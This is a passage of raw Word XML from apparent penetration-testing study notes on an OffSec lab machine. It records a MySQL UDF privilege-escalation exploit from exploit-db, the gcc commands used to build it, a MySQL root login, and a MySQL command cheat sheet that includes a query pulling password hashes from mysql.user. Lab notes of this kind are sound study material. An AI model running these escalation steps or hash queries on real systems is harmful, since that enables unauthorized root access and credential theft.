        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although in the Pebbles PG Practice as mentioned above, they check mysql which is weird</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A59">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="936"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is because mysql is just the client-side tool we use. mysqld version belongs to the database version of mysql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A5A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="936"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysqld --version</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="936"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5695950" cy="600075"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="336" name="image330.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image330.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId534"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="56959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1A5C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A5D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, they found this exploitDB that applies to version 4 and 5 of mySQL, and it allows for privilege escalation. It says version 5.0, but it seemed to work here.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A5E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId535">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/1518</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A5F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A60">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Commands ran (from exploitDB):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="959"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -g -c raptor_udf2.c -fPIC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="959"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fPIC</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">they added themselves in the video, because target machine is 64-bit and I think the exploit was for 32-bit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="959"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You generally use -fPIC whenever you’re compiling code that will be turned into a shared library (.so file) or loaded as a plugin/module by another program.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="959"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="959"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql -u root -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="959"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5695950" cy="4800600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="387" name="image384.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image384.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId536"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="569595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1A67">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A68">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A69">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e8z0h2fued0o" w:id="216"/>
      <w:bookmarkEnd w:id="216"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mysql commands</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A6A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A6B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Most important mysql commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1422"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SHOW databases;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Prints out the databases we can access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1422"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">USE {database_name}; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Set to use the database named {database_name}.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1422"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SHOW tables; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Prints out the available tables inside the current database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1422"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM {table_name};</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Prints out all the data from the table {table_name}.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1422"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM users WHERE user_name='leon';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A71">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1422"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A72">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1422"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user_name </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is column name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A73">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1422"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user, authentication_string </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM mysql.user WHERE user = 'offsec';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A74">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1422"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can select</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> multiple columns</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> this way</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A75">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A76">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A77">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysqql commands for system:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1168"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">select version(); </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> select @@version;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1168"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="1812436" cy="1033407"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="198" name="image197.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image197.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId537"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1812436" cy="1033407"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1168"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">select system_user();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1168"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="1910965" cy="1029798"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="132" name="image115.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image115.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId538"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1910965" cy="1029798"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1168"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The root user in this example is the database-specific root user, not the system-wide administrative root user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A7D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
